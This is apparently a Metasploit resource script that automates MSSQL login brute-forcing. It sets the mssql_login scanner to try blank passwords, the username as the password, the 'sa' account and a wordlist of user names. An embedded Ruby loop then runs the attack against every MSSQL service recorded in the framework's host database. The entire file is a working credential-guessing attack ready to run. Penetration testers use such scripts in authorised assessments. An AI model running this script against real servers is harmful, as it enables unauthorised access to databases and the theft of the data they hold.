use auxiliary/scanner/mssql/mssql_login
set BLANK_PASSWORDS true
set USER_AS_PASS true
set VERBOSE true
set USERNAME sa
set USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt

<ruby>
framework.db.hosts.each do |host|
  host.services.each do |service|
    if service.name =~ /mssql/i and service.proto == "tcp"
      self.run_single("set RHOSTS #{host.address}")
      self.run_single("set RPORT #{service.port}")
      self.run_single("run")
    end
  end
end
</ruby>
